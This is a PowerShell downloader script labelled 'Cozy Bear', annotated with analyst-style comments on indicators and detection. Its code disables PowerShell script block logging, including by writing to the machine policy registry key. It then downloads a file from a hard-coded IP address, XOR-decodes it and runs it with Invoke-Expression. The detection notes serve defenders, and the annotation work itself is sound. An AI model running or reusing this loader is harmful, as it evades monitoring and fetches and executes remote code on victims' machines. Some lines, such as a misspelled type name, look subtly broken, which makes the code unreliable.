PowerShell Cozy Bear

PowerShell Cozy Bear


#Code By E1.Coders
# Analyst summary: a PowerShell downloader/loader. In order, it (1) attempts to
# turn off script block logging, (2) downloads a file over plain HTTP from a
# hard-coded IP address into %TEMP%, (3) XORs the bytes with a one-byte key, and
# (4) runs the result as PowerShell text via Invoke-Expression.
# The page title uses a threat-actor name; nothing in the code itself
# establishes attribution.
# Gate: everything below only runs on PowerShell 3 or later.
if ($PSVersionTable.PSVersion.Major -ge 3) {
# --- Stage 1: logging tampering attempt (defense evasion) ---
# Tries to reach the engine's cached Group Policy settings through the
# System.Management.Automation Utils type.
# NOTE(review): do not conclude from reading alone that logging was (or was
# not) disabled on a host; confirm against script block log (Event ID 4104)
# continuity and the actual registry state.
$utils = [System.Management.Automation.Utils]
$cachedGroupPolicySettings = $utils::GetFieldValue([System.Management.Automination.Utils], "cachedGroupPolicySettings")
if ($cachedGroupPolicySettings) {
if ($cachedGroupPolicySettings.ContainsKey("EnableScriptBlockLogging")) {
# Sets the in-memory values for both script block logging settings to 0.
$cachedGroupPolicySettings["EnableScriptBlockLogging"] = 0
$cachedGroupPolicySettings["EnableScriptBlockInvocationLogging"] = 0
}
# Writes a value under the machine-wide PowerShell policy key. Detection
# point: registry value-set telemetry (e.g. Sysmon Event ID 13) on
# HKLM:\Software\Policies\Microsoft\Windows\PowerShell from a powershell.exe
# process. Presumably requires elevation to succeed - verify on the host.
Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\PowerShell" -Name "ScriptBlockLogging" -Value $cachedGroupPolicySettings["EnableScriptBlockLogging"]
}
# --- Stage 2: download ---
# Hard-coded browser User-Agent string (Chrome 58). A browser UA coming from
# a PowerShell process is a usable proxy/network detection signal.
$userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
# Network IoC: unencrypted HTTP to a raw IP address, no hostname.
$payloadUrl = "http://46.246.38.234/malware.exe"
# File IoC: the download lands in the current user's %TEMP% directory.
$payloadPath = "$env:TEMP\malware.exe"
Invoke-WebRequest -Uri $payloadUrl -OutFile $payloadPath -UserAgent $userAgent
# --- Stage 3: decode ---
# Single-byte XOR with 0x42 over every byte of the downloaded file. This is
# obfuscation, not encryption: the key is in the script, so a captured sample
# can be decoded offline for analysis.
$key = 0x42
$payloadBytes = [System.IO.File]::ReadAllBytes($payloadPath)
$decryptedPayloadBytes = $payloadBytes | ForEach-Object { $_ -bxor $key }
# The decoded bytes are interpreted as UTF-8 text, so despite the ".exe" file
# name the second stage is treated as script text, not a PE image.
$decryptedPayload = [System.Text.Encoding]::UTF8.GetString($decryptedPayloadBytes)
# --- Stage 4: execute ---
# Runs the decoded text in the current PowerShell session. Where script block
# logging is still active, the decoded content passed to Invoke-Expression is
# what the 4104 events would capture.
Invoke-Expression $decryptedPayload
} else {
# On PowerShell 2 or earlier the script only prints this message and exits.
Write-Host "PowerShell version 3 or later is required to run this script."
}
 